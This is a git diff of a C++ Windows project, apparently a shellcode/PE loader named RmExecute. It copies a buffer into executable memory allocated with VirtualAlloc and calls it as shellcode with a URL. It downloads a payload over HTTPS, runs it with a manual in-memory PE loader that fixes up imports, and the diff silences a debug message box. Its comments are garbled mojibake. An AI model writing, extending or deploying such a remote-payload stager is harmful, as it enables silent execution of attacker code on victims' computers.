diff --git a/RUN_EXE_MT/RmExecute.exe b/RUN_EXE_MT/RmExecute.exe
new file mode 100644
index 0000000..a92f910
Binary files /dev/null and b/RUN_EXE_MT/RmExecute.exe differ
diff --git a/RmExecute/123.bin b/RmExecute/123.bin
deleted file mode 100644
index b64eced..0000000
Binary files a/RmExecute/123.bin and /dev/null differ
diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp
index 6982e42..23d337e 100644
--- a/RmExecute/Loader.cpp
+++ b/RmExecute/Loader.cpp
@@ -86,8 +86,12 @@ void RunShellCode()
typedef void(WINAPI* fnFun)(
char*
);
-
- fnFun Shellcode = (fnFun)(filebuf);
+ PVOID p = NULL;
+ if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
+ MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
+ if (!(memcpy(p, filebuf, filelen)))
+ MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
+ fnFun Shellcode = (fnFun)p;
Shellcode(URL);
}
diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe b/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe
deleted file mode 100644
index 7fa831b..0000000
--- a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-
-
- C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe
-
-
-
-
-
-
\ No newline at end of file
diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt
deleted file mode 100644
index e69de29..0000000
diff --git a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe b/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe
deleted file mode 100644
index 03cf3a8..0000000
--- a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-
-
- C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe
-
-
-
-
-
-
\ No newline at end of file
diff --git a/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt
deleted file mode 100644
index e69de29..0000000
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index c46d6fa..cbbaed2 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -167,7 +167,7 @@
- _DEBUG
+ _CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB
@@ -193,7 +193,7 @@
- false
+ true
Console
true
false
@@ -208,7 +208,7 @@
Level3
true
false
- RUNEXEMT;_CRT_SECURE_NO_WARNINGS
+ RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG
MultiThreaded
false
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 017fc01..7f7b6b5 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -2,7 +2,7 @@
//¼ÓÔØÆðʼº¯Êý£¬Ìøתµ½Èë¿Úº¯Êý
#ifdef _WIN64
-VOID mmLoaderSCStart(){
+VOID mmLoaderSCStart(){
Strat();
#else
VOID _declspec(naked) mmLoaderSCStart()
@@ -27,7 +27,6 @@ public:
Functions fn;
- char s_runexe[260];
char* newbuff;
@@ -38,8 +37,8 @@ public:
newbuff = NULL;
Initfunctions(&fn);
- char runexe[] = { 'A', 'A','\0' };
- fn.fnmemcpy(s_runexe, runexe, 260);
+
+
};
@@ -67,7 +66,7 @@ public:
int size = HttpDownload(host, path, 443, TRUE);
- fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+ //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
RunPortableExecutable();
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 0e615d8..d884a8a 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
DWORD op;
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
- __try {
+
while (import_table->Name) {
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
@@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
}
import_table++;
}
- }
- __except (1) {
-
- }
+
+
return;
}
diff --git a/RmExecute/open.txt b/RmExecute/open.txt
deleted file mode 100644
index 02cfe0b..0000000
--- a/RmExecute/open.txt
+++ /dev/null
@@ -1 +0,0 @@
-213
\ No newline at end of file